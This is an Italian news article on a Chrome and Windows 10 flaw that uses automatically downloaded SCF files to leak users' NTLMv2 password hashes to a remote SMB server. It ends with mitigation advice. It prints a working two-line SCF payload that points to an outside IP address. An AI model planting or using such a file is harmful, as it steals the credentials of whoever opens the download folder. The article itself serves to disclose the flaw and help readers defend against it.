Gli attacchi che coinvolgono il protocollo SMB su Windows sono un problema costante e gli exploit finora conosciuti sono innumerevoli. Recentemente un security engineer di DefenseCode, Bosko Stakanovic ha scoperto una vulnerabilità dovuta alla configurazione di default di Google Chrome e al comportamento di Windows 10 nel trattamento dei file SCF .
Con questa configurazione di default il browser scarica automaticamente i file che ritiene sicuri senza interrogare l’utente sulla locazione in cui verrà effettuato il download, ma usando la cartella presente di default.
L’estensione SCF ( Windows Explorer Shell Command ) è utilizzata dai tempi di Windows 98 per creare dei file speciali con icona personalizzata in grado di richiamare funzionalità di sistema, come ad esempio il collegamento “Mostra Desktop”.
Come spiegato da Stakanovich una volta che l’utente viene portato a cliccare su un link malevolo questo innesca un download automatico di un file di tipo SCF, che induce Windows ad effettuare un tentativo di autenticazione a un server SMB remoto . Il file malevolo può contenere anche solo due righe, come nell’esempio seguente:
[Shell]
IconFile=\\170.170.170.170\icon
L’SCF, una volta scaricato, rimane dormiente finché la vittima non apre la cartella “Download”, dopodiché, senza bisogno che l’utente clicchi sul file scaricato Windows, tenterà automaticamente di raggiungere “l’icona” specificata, presentando le sue credenziali al server remoto.
Ciò fornisce all’attaccante l’username della vittima e l’hash NTLMv2 delle password , che potranno essere utilizzati offline per il cracking o per accedere direttamente ad altri servizi che accettano lo stesso tipo di autenticazione.
Stakanovich sostiene che questo attacco può essere usato anche per perpetrare attacchi di tipo SMB relay : le organizzazioni che permettono accesso remoto a servizi come Microsoft Exchange e usano NTLM come metodo di autenticazione potrebbero essere vulnerabili, permettendo all’hacker di accedere ai dati senza dover rompere la password.
Questi tipi di attacchi permettono a utenti malevoli di impersonare altri soggetti , perciò sono un problema anche per le grandi aziende; le credenziali rubate possono essere utilizzate in tempi successivi al loro furto per eseguire privilege escalation al fine di prendere il controllo delle risorse IT. Per gli utenti di Windows 8/10 che usano un account Microsoft, invece che l’account locale, avranno impatto anche su tutti i servizi Microsoft collegati (Outlook.com, Office360 ecc.).
Al momento, Chrome sta lavorando a un fix . Nel frattempo, per proteggersi dagli impatti della vulnerabilità, si raccomanda di disabilitare il salvataggio automatico dei file in Chrome andando nel menu Impostazioni/Mostra impostazioni avanzate e selezionando l’opzione Richiedi dove salvare ogni file prima di scaricare. Inoltre, è consigliabile limitare il traffico SMB alle reti private, configurando il firewall di modo da bloccare le porte 137, 138, 139 e 445 verso la rete Internet.